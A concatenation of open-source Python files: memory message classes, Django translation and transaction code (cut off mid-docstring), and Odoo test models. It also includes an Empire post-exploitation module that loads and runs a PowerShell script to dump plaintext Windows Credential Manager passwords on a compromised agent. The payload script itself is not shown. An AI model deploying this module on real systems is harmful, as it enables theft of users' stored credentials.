def mk_rd( s, addr, len_ ):
msg = s()
msg.type_ = MemReqMsg.TYPE_READ
msg.addr = addr
msg.len = len_
msg.data = 0
return msg
def mk_wr( s, addr, len_, data ):
msg = s()
msg.type_ = MemReqMsg.TYPE_WRITE
msg.addr = addr
msg.len = len_
msg.data = data
return msg
def __str__( s ):
if s.type_ == MemReqMsg.TYPE_READ:
return "rd:{}:{}".format( s.addr, ' '*(s.data.nbits/4) )
elif s.type_ == MemReqMsg.TYPE_WRITE:
return "wr:{}:{}".format( s.addr, s.data )
#-------------------------------------------------------------------------
# MemReqMsg
#-------------------------------------------------------------------------
# Memory response messages can either be for a read or write. Read
# responses include the actual data and the number of bytes, while write
# responses currently include nothing other than the type.
#
# Message Format:
#
# 1b calc data_nbits
# +------+------+-----------+
# | type | len | data |
# +------+------+-----------+
#
# The message type is parameterized by the number of address and data
# bits. Note that the size of the length field is caclulated from the
# number of bits in the data field, and that the length field is
# expressed in _bytes_. If the value of the length field is zero, then
# the read or write should be for the full width of the data field.
#
# For example, if the address size is 32 bits and the data size is also
# 32 bits, then the message format is as follows:
#
# 34 34 33 32 31 0
# +------+------+-----------+
# | type | len | data |
# +------+------+-----------+
#
# The length field is two bits. A length value of one means a single byte
# of read data is valid, a length value of two means two bytes of read
# data is valid, and so on. A length value of zero means all four bytes
# of the read data is valid. Note that not all memories will necessarily
# support any alignment and/or any value for the length field.
class MemRespMsg( BitStructDefinition ):
TYPE_READ = 0
TYPE_WRITE = 1
def __init__( s, data_nbits ):
s.type_nbits = 1
s.len_nbits = int( math.ceil( math.log( data_nbits/8, 2 ) ) )
s.data_nbits = data_nbits
s.type_ = BitField( s.type_nbits )
s.len = BitField( s.len_nbits )
s.data = BitField( s.data_nbits )
def mk_msg( s, type_, len_, data ):
msg = s()
msg.type_ = type_
msg.len = len_
msg.data = data
return msg
# What exactly is this method for? -cbatten
def unpck( s, msg ):
resp = s()
resp.value = msg
return resp
def __str__( s ):
if s.type_ == MemRespMsg.TYPE_READ:
return "rd:{}".format( s.data )
elif s.type_ == MemRespMsg.TYPE_WRITE:
return "wr:{}".format( ' '*(s.data.nbits/4) )
#-------------------------------------------------------------------------
# MemMsg
#-------------------------------------------------------------------------
# Single class that contains both the memory request and response types.
# This simplifies parameterizing models both both message types since (1)
# we can specifcy the address and data nbits in a single step, and (2) we
# can pass a single object into the parameterized model.
class MemMsg( object ):
def __init__( s, addr_nbits, data_nbits ):
s.req = MemReqMsg ( addr_nbits, data_nbits )
s.resp = MemRespMsg( data_nbits )
|
bsd-3-clause
|
mcsosa121/cafa
|
cafaenv/lib/python2.7/site-packages/django/utils/translation/trans_real.py
|
35
|
28112
|
"""Translation helper functions."""
from __future__ import unicode_literals
import gettext as gettext_module
import os
import re
import sys
import warnings
from collections import OrderedDict
from threading import local
from django.apps import apps
from django.conf import settings
from django.conf.locale import LANG_INFO
from django.core.exceptions import AppRegistryNotReady
from django.core.signals import setting_changed
from django.dispatch import receiver
from django.utils import lru_cache, six
from django.utils._os import upath
from django.utils.encoding import force_text
from django.utils.safestring import SafeData, mark_safe
from django.utils.six import StringIO
from django.utils.translation import (
LANGUAGE_SESSION_KEY, TranslatorCommentWarning, trim_whitespace,
)
# Translations are cached in a dictionary for every language.
# The active translations are stored by threadid to make them thread local.
_translations = {}
_active = local()
# The default translation is based on the settings file.
_default = None
# magic gettext number to separate context from message
CONTEXT_SEPARATOR = "\x04"
# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9
# and RFC 3066, section 2.1
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*|\*) # "en", "en-au", "x-y-z", "es-419", "*"
(?:\s*;\s*q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
language_code_re = re.compile(
r'^[a-z]{1,8}(?:-[a-z0-9]{1,8})*(?:@[a-z0-9]{1,20})?$',
re.IGNORECASE
)
language_code_prefix_re = re.compile(r'^/([\w@-]+)(/|$)')
@receiver(setting_changed)
def reset_cache(**kwargs):
"""
Reset global state when LANGUAGES setting has been changed, as some
languages should no longer be accepted.
"""
if kwargs['setting'] in ('LANGUAGES', 'LANGUAGE_CODE'):
check_for_language.cache_clear()
get_languages.cache_clear()
get_supported_language_variant.cache_clear()
def to_locale(language, to_lower=False):
"""
Turns a language name (en-us) into a locale name (en_US). If 'to_lower' is
True, the last component is lower-cased (en_us).
"""
p = language.find('-')
if p >= 0:
if to_lower:
return language[:p].lower() + '_' + language[p + 1:].lower()
else:
# Get correct locale for sr-latn
if len(language[p + 1:]) > 2:
return language[:p].lower() + '_' + language[p + 1].upper() + language[p + 2:].lower()
return language[:p].lower() + '_' + language[p + 1:].upper()
else:
return language.lower()
def to_language(locale):
"""Turns a locale name (en_US) into a language name (en-us)."""
p = locale.find('_')
if p >= 0:
return locale[:p].lower() + '-' + locale[p + 1:].lower()
else:
return locale.lower()
class DjangoTranslation(gettext_module.GNUTranslations):
"""
This class sets up the GNUTranslations context with regard to output
charset.
This translation object will be constructed out of multiple GNUTranslations
objects by merging their catalogs. It will construct an object for the
requested language and add a fallback to the default language, if it's
different from the requested language.
"""
def __init__(self, language):
"""Create a GNUTranslations() using many locale directories"""
gettext_module.GNUTranslations.__init__(self)
self.set_output_charset('utf-8') # For Python 2 gettext() (#25720)
self.__language = language
self.__to_language = to_language(language)
self.__locale = to_locale(language)
self._init_translation_catalog()
self._add_installed_apps_translations()
self._add_local_translations()
self._add_fallback()
def __repr__(self):
return "<DjangoTranslation lang:%s>" % self.__language
def _new_gnu_trans(self, localedir, use_null_fallback=True):
"""
Returns a mergeable gettext.GNUTranslations instance.
A convenience wrapper. By default gettext uses 'fallback=False'.
Using param `use_null_fallback` to avoid confusion with any other
references to 'fallback'.
"""
translation = gettext_module.translation(
domain='django',
localedir=localedir,
languages=[self.__locale],
codeset='utf-8',
fallback=use_null_fallback)
if not hasattr(translation, '_catalog'):
# provides merge support for NullTranslations()
translation._catalog = {}
translation._info = {}
translation.plural = lambda n: int(n != 1)
return translation
def _init_translation_catalog(self):
"""Creates a base catalog using global django translations."""
settingsfile = upath(sys.modules[settings.__module__].__file__)
localedir = os.path.join(os.path.dirname(settingsfile), 'locale')
use_null_fallback = True
if self.__language == settings.LANGUAGE_CODE:
# default lang should be present and parseable, if not
# gettext will raise an IOError (refs #18192).
use_null_fallback = False
translation = self._new_gnu_trans(localedir, use_null_fallback)
self.plural = translation.plural
self._info = translation._info.copy()
self._catalog = translation._catalog.copy()
def _add_installed_apps_translations(self):
"""Merges translations from each installed app."""
try:
app_configs = reversed(list(apps.get_app_configs()))
except AppRegistryNotReady:
raise AppRegistryNotReady(
"The translation infrastructure cannot be initialized before the "
"apps registry is ready. Check that you don't make non-lazy "
"gettext calls at import time.")
for app_config in app_configs:
localedir = os.path.join(app_config.path, 'locale')
translation = self._new_gnu_trans(localedir)
self.merge(translation)
def _add_local_translations(self):
"""Merges translations defined in LOCALE_PATHS."""
for localedir in reversed(settings.LOCALE_PATHS):
translation = self._new_gnu_trans(localedir)
self.merge(translation)
def _add_fallback(self):
"""Sets the GNUTranslations() fallback with the default language."""
# Don't set a fallback for the default language or any English variant
# (as it's empty, so it'll ALWAYS fall back to the default language)
if self.__language == settings.LANGUAGE_CODE or self.__language.startswith('en'):
return
default_translation = translation(settings.LANGUAGE_CODE)
self.add_fallback(default_translation)
def merge(self, other):
"""Merge another translation into this catalog."""
self._catalog.update(other._catalog)
def language(self):
"""Returns the translation language."""
return self.__language
def to_language(self):
"""Returns the translation language name."""
return self.__to_language
def translation(language):
"""
Returns a translation object.
"""
global _translations
if language not in _translations:
_translations[language] = DjangoTranslation(language)
return _translations[language]
def activate(language):
"""
Fetches the translation object for a given language and installs it as the
current translation object for the current thread.
"""
if not language:
return
_active.value = translation(language)
def deactivate():
"""
Deinstalls the currently active translation object so that further _ calls
will resolve against the default translation object, again.
"""
if hasattr(_active, "value"):
del _active.value
def deactivate_all():
"""
Makes the active translation object a NullTranslations() instance. This is
useful when we want delayed translations to appear as the original string
for some reason.
"""
_active.value = gettext_module.NullTranslations()
_active.value.to_language = lambda *args: None
def get_language():
"""Returns the currently selected language."""
t = getattr(_active, "value", None)
if t is not None:
try:
return t.to_language()
except AttributeError:
pass
# If we don't have a real translation object, assume it's the default language.
return settings.LANGUAGE_CODE
def get_language_bidi():
"""
Returns selected language's BiDi layout.
* False = left-to-right layout
* True = right-to-left layout
"""
lang = get_language()
if lang is None:
return False
else:
base_lang = get_language().split('-')[0]
return base_lang in settings.LANGUAGES_BIDI
def catalog():
"""
Returns the current active catalog for further processing.
This can be used if you need to modify the catalog or want to access the
whole message catalog instead of just translating one string.
"""
global _default
t = getattr(_active, "value", None)
if t is not None:
return t
if _default is None:
_default = translation(settings.LANGUAGE_CODE)
return _default
def do_translate(message, translation_function):
"""
Translates 'message' using the given 'translation_function' name -- which
will be either gettext or ugettext. It uses the current thread to find the
translation object to use. If no current translation is activated, the
message will be run through the default translation object.
"""
global _default
# str() is allowing a bytestring message to remain bytestring on Python 2
eol_message = message.replace(str('\r\n'), str('\n')).replace(str('\r'), str('\n'))
if len(eol_message) == 0:
# Returns an empty value of the corresponding type if an empty message
# is given, instead of metadata, which is the default gettext behavior.
result = type(message)("")
else:
_default = _default or translation(settings.LANGUAGE_CODE)
translation_object = getattr(_active, "value", _default)
result = getattr(translation_object, translation_function)(eol_message)
if isinstance(message, SafeData):
return mark_safe(result)
return result
def gettext(message):
"""
Returns a string of the translation of the message.
Returns a string on Python 3 and an UTF-8-encoded bytestring on Python 2.
"""
return do_translate(message, 'gettext')
if six.PY3:
ugettext = gettext
else:
def ugettext(message):
return do_translate(message, 'ugettext')
def pgettext(context, message):
msg_with_ctxt = "%s%s%s" % (context, CONTEXT_SEPARATOR, message)
result = ugettext(msg_with_ctxt)
if CONTEXT_SEPARATOR in result:
# Translation not found
# force unicode, because lazy version expects unicode
result = force_text(message)
return result
def gettext_noop(message):
"""
Marks strings for translation but doesn't translate them now. This can be
used to store strings in global variables that should stay in the base
language (because they might be used externally) and will be translated
later.
"""
return message
def do_ntranslate(singular, plural, number, translation_function):
global _default
t = getattr(_active, "value", None)
if t is not None:
return getattr(t, translation_function)(singular, plural, number)
if _default is None:
_default = translation(settings.LANGUAGE_CODE)
return getattr(_default, translation_function)(singular, plural, number)
def ngettext(singular, plural, number):
"""
Returns a string of the translation of either the singular or plural,
based on the number.
Returns a string on Python 3 and an UTF-8-encoded bytestring on Python 2.
"""
return do_ntranslate(singular, plural, number, 'ngettext')
if six.PY3:
ungettext = ngettext
else:
def ungettext(singular, plural, number):
"""
Returns a unicode strings of the translation of either the singular or
plural, based on the number.
"""
return do_ntranslate(singular, plural, number, 'ungettext')
def npgettext(context, singular, plural, number):
msgs_with_ctxt = ("%s%s%s" % (context, CONTEXT_SEPARATOR, singular),
"%s%s%s" % (context, CONTEXT_SEPARATOR, plural),
number)
result = ungettext(*msgs_with_ctxt)
if CONTEXT_SEPARATOR in result:
# Translation not found
result = ungettext(singular, plural, number)
return result
def all_locale_paths():
"""
Returns a list of paths to user-provides languages files.
"""
globalpath = os.path.join(
os.path.dirname(upath(sys.modules[settings.__module__].__file__)), 'locale')
return [globalpath] + list(settings.LOCALE_PATHS)
@lru_cache.lru_cache(maxsize=1000)
def check_for_language(lang_code):
"""
Checks whether there is a global language file for the given language
code. This is used to decide whether a user-provided language is
available.
lru_cache should have a maxsize to prevent from memory exhaustion attacks,
as the provided language codes are taken from the HTTP request. See also
<https://www.djangoproject.com/weblog/2007/oct/26/security-fix/>.
"""
# First, a quick check to make sure lang_code is well-formed (#21458)
if lang_code is None or not language_code_re.search(lang_code):
return False
for path in all_locale_paths():
if gettext_module.find('django', path, [to_locale(lang_code)]) is not None:
return True
return False
@lru_cache.lru_cache()
def get_languages():
"""
Cache of settings.LANGUAGES in an OrderedDict for easy lookups by key.
"""
return OrderedDict(settings.LANGUAGES)
@lru_cache.lru_cache(maxsize=1000)
def get_supported_language_variant(lang_code, strict=False):
"""
Returns the language-code that's listed in supported languages, possibly
selecting a more generic variant. Raises LookupError if nothing found.
If `strict` is False (the default), the function will look for an alternative
country-specific variant when the currently checked is not found.
lru_cache should have a maxsize to prevent from memory exhaustion attacks,
as the provided language codes are taken from the HTTP request. See also
<https://www.djangoproject.com/weblog/2007/oct/26/security-fix/>.
"""
if lang_code:
# If 'fr-ca' is not supported, try special fallback or language-only 'fr'.
possible_lang_codes = [lang_code]
try:
possible_lang_codes.extend(LANG_INFO[lang_code]['fallback'])
except KeyError:
pass
generic_lang_code = lang_code.split('-')[0]
possible_lang_codes.append(generic_lang_code)
supported_lang_codes = get_languages()
for code in possible_lang_codes:
if code in supported_lang_codes and check_for_language(code):
return code
if not strict:
# if fr-fr is not supported, try fr-ca.
for supported_code in supported_lang_codes:
if supported_code.startswith(generic_lang_code + '-'):
return supported_code
raise LookupError(lang_code)
def get_language_from_path(path, strict=False):
"""
Returns the language-code if there is a valid language-code
found in the `path`.
If `strict` is False (the default), the function will look for an alternative
country-specific variant when the currently checked is not found.
"""
regex_match = language_code_prefix_re.match(path)
if not regex_match:
return None
lang_code = regex_match.group(1)
try:
return get_supported_language_variant(lang_code, strict=strict)
except LookupError:
return None
def get_language_from_request(request, check_path=False):
"""
Analyzes the request to find what language the user wants the system to
show. Only languages listed in settings.LANGUAGES are taken into account.
If the user requests a sublanguage where we have a main language, we send
out the main language.
If check_path is True, the URL path prefix will be checked for a language
code, otherwise this is skipped for backwards compatibility.
"""
if check_path:
lang_code = get_language_from_path(request.path_info)
if lang_code is not None:
return lang_code
supported_lang_codes = get_languages()
if hasattr(request, 'session'):
lang_code = request.session.get(LANGUAGE_SESSION_KEY)
if lang_code in supported_lang_codes and lang_code is not None and check_for_language(lang_code):
return lang_code
lang_code = request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME)
try:
return get_supported_language_variant(lang_code)
except LookupError:
pass
accept = request.META.get('HTTP_ACCEPT_LANGUAGE', '')
for accept_lang, unused in parse_accept_lang_header(accept):
if accept_lang == '*':
break
if not language_code_re.search(accept_lang):
continue
try:
return get_supported_language_variant(accept_lang)
except LookupError:
continue
try:
return get_supported_language_variant(settings.LANGUAGE_CODE)
except LookupError:
return settings.LANGUAGE_CODE
dot_re = re.compile(r'\S')
def blankout(src, char):
"""
Changes every non-whitespace character to the given char.
Used in the templatize function.
"""
return dot_re.sub(char, src)
context_re = re.compile(r"""^\s+.*context\s+((?:"[^"]*?")|(?:'[^']*?'))\s*""")
inline_re = re.compile(
# Match the trans 'some text' part
r"""^\s*trans\s+((?:"[^"]*?")|(?:'[^']*?'))"""
# Match and ignore optional filters
r"""(?:\s*\|\s*[^\s:]+(?::(?:[^\s'":]+|(?:"[^"]*?")|(?:'[^']*?')))?)*"""
# Match the optional context part
r"""(\s+.*context\s+((?:"[^"]*?")|(?:'[^']*?')))?\s*"""
)
block_re = re.compile(r"""^\s*blocktrans(\s+.*context\s+((?:"[^"]*?")|(?:'[^']*?')))?(?:\s+|$)""")
endblock_re = re.compile(r"""^\s*endblocktrans$""")
plural_re = re.compile(r"""^\s*plural$""")
constant_re = re.compile(r"""_\(((?:".*?")|(?:'.*?'))\)""")
def templatize(src, origin=None):
"""
Turns a Django template into something that is understood by xgettext. It
does so by translating the Django translation tags into standard gettext
function invocations.
"""
from django.template.base import (Lexer, TOKEN_TEXT, TOKEN_VAR,
TOKEN_BLOCK, TOKEN_COMMENT, TRANSLATOR_COMMENT_MARK)
src = force_text(src, settings.FILE_CHARSET)
out = StringIO('')
message_context = None
intrans = False
inplural = False
trimmed = False
singular = []
plural = []
incomment = False
comment = []
lineno_comment_map = {}
comment_lineno_cache = None
def join_tokens(tokens, trim=False):
message = ''.join(tokens)
if trim:
message = trim_whitespace(message)
return message
for t in Lexer(src).tokenize():
if incomment:
if t.token_type == TOKEN_BLOCK and t.contents == 'endcomment':
content = ''.join(comment)
translators_comment_start = None
for lineno, line in enumerate(content.splitlines(True)):
if line.lstrip().startswith(TRANSLATOR_COMMENT_MARK):
translators_comment_start = lineno
for lineno, line in enumerate(content.splitlines(True)):
if translators_comment_start is not None and lineno >= translators_comment_start:
out.write(' # %s' % line)
else:
out.write(' #\n')
incomment = False
comment = []
else:
comment.append(t.contents)
elif intrans:
if t.token_type == TOKEN_BLOCK:
endbmatch = endblock_re.match(t.contents)
pluralmatch = plural_re.match(t.contents)
if endbmatch:
if inplural:
if message_context:
out.write(' npgettext(%r, %r, %r,count) ' % (
message_context,
join_tokens(singular, trimmed),
join_tokens(plural, trimmed)))
else:
out.write(' ngettext(%r, %r, count) ' % (
join_tokens(singular, trimmed),
join_tokens(plural, trimmed)))
for part in singular:
out.write(blankout(part, 'S'))
for part in plural:
out.write(blankout(part, 'P'))
else:
if message_context:
out.write(' pgettext(%r, %r) ' % (
message_context,
join_tokens(singular, trimmed)))
else:
out.write(' gettext(%r) ' % join_tokens(singular,
trimmed))
for part in singular:
out.write(blankout(part, 'S'))
message_context = None
intrans = False
inplural = False
singular = []
plural = []
elif pluralmatch:
inplural = True
else:
filemsg = ''
if origin:
filemsg = 'file %s, ' % origin
raise SyntaxError(
"Translation blocks must not include other block tags: "
"%s (%sline %d)" % (t.contents, filemsg, t.lineno)
)
elif t.token_type == TOKEN_VAR:
if inplural:
plural.append('%%(%s)s' % t.contents)
else:
singular.append('%%(%s)s' % t.contents)
elif t.token_type == TOKEN_TEXT:
contents = t.contents.replace('%', '%%')
if inplural:
plural.append(contents)
else:
singular.append(contents)
else:
# Handle comment tokens (`{# ... #}`) plus other constructs on
# the same line:
if comment_lineno_cache is not None:
cur_lineno = t.lineno + t.contents.count('\n')
if comment_lineno_cache == cur_lineno:
if t.token_type != TOKEN_COMMENT:
for c in lineno_comment_map[comment_lineno_cache]:
filemsg = ''
if origin:
filemsg = 'file %s, ' % origin
warn_msg = ("The translator-targeted comment '%s' "
"(%sline %d) was ignored, because it wasn't the last item "
"on the line.") % (c, filemsg, comment_lineno_cache)
warnings.warn(warn_msg, TranslatorCommentWarning)
lineno_comment_map[comment_lineno_cache] = []
else:
out.write('# %s' % ' | '.join(lineno_comment_map[comment_lineno_cache]))
comment_lineno_cache = None
if t.token_type == TOKEN_BLOCK:
imatch = inline_re.match(t.contents)
bmatch = block_re.match(t.contents)
cmatches = constant_re.findall(t.contents)
if imatch:
g = imatch.group(1)
if g[0] == '"':
g = g.strip('"')
elif g[0] == "'":
g = g.strip("'")
g = g.replace('%', '%%')
if imatch.group(2):
# A context is provided
context_match = context_re.match(imatch.group(2))
message_context = context_match.group(1)
if message_context[0] == '"':
message_context = message_context.strip('"')
elif message_context[0] == "'":
message_context = message_context.strip("'")
out.write(' pgettext(%r, %r) ' % (message_context, g))
message_context = None
else:
out.write(' gettext(%r) ' % g)
elif bmatch:
for fmatch in constant_re.findall(t.contents):
out.write(' _(%s) ' % fmatch)
if bmatch.group(1):
# A context is provided
context_match = context_re.match(bmatch.group(1))
message_context = context_match.group(1)
if message_context[0] == '"':
message_context = message_context.strip('"')
elif message_context[0] == "'":
message_context = message_context.strip("'")
intrans = True
inplural = False
trimmed = 'trimmed' in t.split_contents()
singular = []
plural = []
elif cmatches:
for cmatch in cmatches:
out.write(' _(%s) ' % cmatch)
elif t.contents == 'comment':
incomment = True
else:
out.write(blankout(t.contents, 'B'))
elif t.token_type == TOKEN_VAR:
parts = t.contents.split('|')
cmatch = constant_re.match(parts[0])
if cmatch:
out.write(' _(%s) ' % cmatch.group(1))
for p in parts[1:]:
if p.find(':_(') >= 0:
out.write(' %s ' % p.split(':', 1)[1])
else:
out.write(blankout(p, 'F'))
elif t.token_type == TOKEN_COMMENT:
if t.contents.lstrip().startswith(TRANSLATOR_COMMENT_MARK):
lineno_comment_map.setdefault(t.lineno,
[]).append(t.contents)
comment_lineno_cache = t.lineno
else:
out.write(blankout(t.contents, 'X'))
return out.getvalue()
def parse_accept_lang_header(lang_string):
"""
Parses the lang_string, which is the body of an HTTP Accept-Language
header, and returns a list of (lang, q-value), ordered by 'q' values.
Any format errors in lang_string results in an empty list being returned.
"""
result = []
pieces = accept_language_re.split(lang_string.lower())
if pieces[-1]:
return []
for i in range(0, len(pieces) - 1, 3):
first, lang, priority = pieces[i:i + 3]
if first:
return []
if priority:
try:
priority = float(priority)
except ValueError:
return []
if not priority: # if priority is 0.0 at this point make it 1.0
priority = 1.0
result.append((lang, priority))
result.sort(key=lambda k: k[1], reverse=True)
return result
|
mit
|
pierce403/EmpirePanel
|
lib/modules/credentials/enum_cred_store.py
|
1
|
1940
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'enum_cred_store',
'Author': ['BeetleChunks'],
'Description': ('Dumps plaintext credentials from the Windows Credential Manager for the current interactive user.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': ['The powershell used is based on JimmyJoeBob Alooba\'s CredMan script.\nhttps://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde']
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
scriptPath = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1"
scriptCmd = "Invoke-X"
try:
f = open(scriptPath, 'r')
except:
print helpers.color("[!] Unable to open script at the configured path: " + str(scriptPath))
return ""
script = f.read()
f.close()
script += "\n%s" %(scriptCmd)
return script
|
bsd-3-clause
|
apanju/odoo
|
openerp/addons/test_inherits/models.py
|
295
|
1141
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api, osv
# We just create a new model
class Unit(models.Model):
_name = 'test.unit'
_columns = {
'name': osv.fields.char('Name', required=True),
'state': osv.fields.selection([('a', 'A'), ('b', 'B')],
string='State'),
}
surname = fields.Char(compute='_compute_surname')
@api.one
@api.depends('name')
def _compute_surname(self):
self.surname = self.name or ''
# We want to _inherits from the parent model and we add some fields
# in the child object
class Box(models.Model):
_name = 'test.box'
_inherits = {'test.unit': 'unit_id'}
unit_id = fields.Many2one('test.unit', 'Unit', required=True,
ondelete='cascade')
field_in_box = fields.Char('Field1')
# We add a third level of _inherits
class Pallet(models.Model):
_name = 'test.pallet'
_inherits = {'test.box': 'box_id'}
box_id = fields.Many2one('test.box', 'Box', required=True,
ondelete='cascade')
field_in_pallet = fields.Char('Field2')
|
agpl-3.0
|
adw0rd/lettuce
|
tests/integration/lib/Django-1.2.5/django/db/transaction.py
|
45
|
12689
|
"""
This module implements a transaction manager that can be used to define
transaction handling in a request or view function. It is used by transaction
control middleware and decorators.
The transaction manager can be in managed or in auto state. Auto state means the
system is using a commit-on-save strategy (actually it's more like
commit-on-change). As soon as the .save() or .delete() (or related) methods are
called, a commit is made.
Managed transactions don't do those commits, but will need some kind of manual
or implicit commits or rollbacks.
"""
try:
import thread
except ImportError:
import dummy_thread as thread
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps # Python 2.4 fallback.
from django.db import connections, DEFAULT_DB_ALIAS
from django.conf import settings
class TransactionManagementError(Exception):
"""
This exception is thrown when something bad happens with transaction
management.
"""
pass
# The states are dictionaries of dictionaries of lists. The key to the outer
# dict is the current thread, and the key to the inner dictionary is the
# connection alias and the list is handled as a stack of values.
state = {}
savepoint_state = {}
# The dirty flag is set by *_unless_managed functions to denote that the
# code under transaction management has changed things to require a
# database commit.
# This is a dictionary mapping thread to a dictionary mapping connection
# alias to a boolean.
dirty = {}
def enter_transaction_management(managed=True, using=None):
"""
Enters transaction management for a running thread. It must be balanced with
the appropriate leave_transaction_management call, since the actual state is
managed as a stack.
The state and dirty flag are carried over from the surrounding block or
from the settings, if there is no surrounding block (dirty is always false
when no current block is running).
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in state and state[thread_ident].get(using):
state[thread_ident][using].append(state[thread_ident][using][-1])
else:
state.setdefault(thread_ident, {})
state[thread_ident][using] = [settings.TRANSACTIONS_MANAGED]
if thread_ident not in dirty or using not in dirty[thread_ident]:
dirty.setdefault(thread_ident, {})
dirty[thread_ident][using] = False
connection._enter_transaction_management(managed)
def leave_transaction_management(using=None):
"""
Leaves transaction management for a running thread. A dirty flag is carried
over to the surrounding block, as a commit will commit all changes, even
those from outside. (Commits are on connection level.)
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._leave_transaction_management(is_managed(using=using))
thread_ident = thread.get_ident()
if thread_ident in state and state[thread_ident].get(using):
del state[thread_ident][using][-1]
else:
raise TransactionManagementError("This code isn't under transaction management")
if dirty.get(thread_ident, {}).get(using, False):
rollback(using=using)
raise TransactionManagementError("Transaction managed block ended with pending COMMIT/ROLLBACK")
dirty[thread_ident][using] = False
def is_dirty(using=None):
"""
Returns True if the current transaction requires a commit for changes to
happen.
"""
if using is None:
using = DEFAULT_DB_ALIAS
return dirty.get(thread.get_ident(), {}).get(using, False)
def set_dirty(using=None):
"""
Sets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether there are open
changes waiting for commit.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in dirty and using in dirty[thread_ident]:
dirty[thread_ident][using] = True
else:
raise TransactionManagementError("This code isn't under transaction management")
def set_clean(using=None):
"""
Resets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether a commit or rollback
should happen.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in dirty and using in dirty[thread_ident]:
dirty[thread_ident][using] = False
else:
raise TransactionManagementError("This code isn't under transaction management")
clean_savepoints(using=using)
def clean_savepoints(using=None):
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
del savepoint_state[thread_ident][using]
def is_managed(using=None):
"""
Checks whether the transaction manager is in manual or in auto state.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in state and using in state[thread_ident]:
if state[thread_ident][using]:
return state[thread_ident][using][-1]
return settings.TRANSACTIONS_MANAGED
def managed(flag=True, using=None):
"""
Puts the transaction manager into a manual state: managed transactions have
to be committed explicitly by the user. If you switch off transaction
management and there is a pending commit/rollback, the data will be
commited.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
top = state.get(thread_ident, {}).get(using, None)
if top:
top[-1] = flag
if not flag and is_dirty(using=using):
connection._commit()
set_clean(using=using)
else:
raise TransactionManagementError("This code isn't under transaction management")
def commit_unless_managed(using=None):
"""
Commits changes if the system is not in managed transaction mode.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
if not is_managed(using=using):
connection._commit()
clean_savepoints(using=using)
else:
set_dirty(using=using)
def rollback_unless_managed(using=None):
"""
Rolls back changes if the system is not in managed transaction mode.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
if not is_managed(using=using):
connection._rollback()
else:
set_dirty(using=using)
def commit(using=None):
"""
Does the commit itself and resets the dirty flag.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._commit()
set_clean(using=using)
def rollback(using=None):
"""
This function does the rollback itself and resets the dirty flag.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._rollback()
set_clean(using=using)
def savepoint(using=None):
"""
Creates a savepoint (if supported and required by the backend) inside the
current transaction. Returns an identifier for the savepoint that will be
used for the subsequent rollback or commit.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
savepoint_state[thread_ident][using].append(None)
else:
savepoint_state.setdefault(thread_ident, {})
savepoint_state[thread_ident][using] = [None]
tid = str(thread_ident).replace('-', '')
sid = "s%s_x%d" % (tid, len(savepoint_state[thread_ident][using]))
connection._savepoint(sid)
return sid
def savepoint_rollback(sid, using=None):
"""
Rolls back the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
connection._savepoint_rollback(sid)
def savepoint_commit(sid, using=None):
"""
Commits the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
connection._savepoint_commit(sid)
##############
# DECORATORS #
##############
def autocommit(using=None):
"""
Decorator that activates commit on save. This is Django's default behavior;
this decorator is useful if you globally activated transaction management in
your settings file and want the default behavior in some view functions.
"""
def inner_autocommit(func, db=None):
def _autocommit(*args, **kw):
try:
enter_transaction_management(managed=False, using=db)
managed(False, using=db)
return func(*args, **kw)
finally:
leave_transaction_management(using=db)
return wraps(func)(_autocommit)
# Note that although the first argument is *called* `using`, it
# may actually be a function; @autocommit and @autocommit('foo')
# are both allowed forms.
if using is None:
using = DEFAULT_DB_ALIAS
if callable(using):
return inner_autocommit(using, DEFAULT_DB_ALIAS)
return lambda func: inner_autocommit(func, using)
def commit_on_success(using=None):
"""
This decorator activates commit on response. This way, if the view function
